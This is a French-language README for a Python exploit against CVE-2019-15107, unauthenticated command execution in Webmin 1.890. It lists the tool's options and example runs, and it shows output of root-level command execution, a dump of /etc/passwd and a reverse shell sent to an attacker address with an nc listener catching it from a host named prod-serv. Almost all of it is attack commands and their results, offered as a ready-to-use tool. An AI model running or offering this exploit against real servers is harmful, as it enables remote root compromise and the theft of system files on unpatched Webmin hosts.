
CVE-2019-15107 Webmin RCE non authentifié
Ce script est conçu pour exploiter la vulnérabilité d'exécution de commandes non authentifiée dans Webmin 1.890. Il vous permet d'exécuter des commandes arbitraires sur un serveur Webmin cible ou d'obtenir un reverse shell.
L'exploit prend 5 arguments :
$ python3 test.py -h
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]
Exploit unauthenticated command execution in Webmin 1.890.
options:
-h, --help show this help message and exit
required arguments:
-i IP Address, --ip IP Address
Target ip address
optional arguments:
-p Port number, --port Port number
Webmin port(default=10000)
-c Command, --command Command
OS Command to execute (Default=id)
--shell Get a reverse shell
-x, --proxy Sends requests through Burp Suite proxy at 127.0.0.1:8080.
Example:
python exploit.py -i 192.168.1.100
python exploit.py -i 192.168.1.100 -p 10000 -c whoami
python exploit.py -i 192.168.1.100 -x -c "ls -la"
python exploit.py -i 192.168.1.100 --shell
La seule option obligatoire est , qui correspond à l'adresse IP de la cible.
-iEn exécutant l'exploit avec uniquement -i, la commande id sera exécutée sur une cible située sur le port 10000
$ python3 exploit.py -i 10.200.105.200
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
Vous pouvez spécifier la commande à exécuter à l'aide des options -c ou --command :
$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]
Vous pouvez également obtenir un reverse shell en utilisant l'option --shell.
Vous serez invité à saisir votre adresse IP et le port d'écoute :
$ python3 exploit.py -i 10.200.105.200 --shell
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]#
En ajoutant l'option -x ou --proxy, vous pouvez envoyer la requête via le proxy Burp à l'adresse 127.0.0.1:8080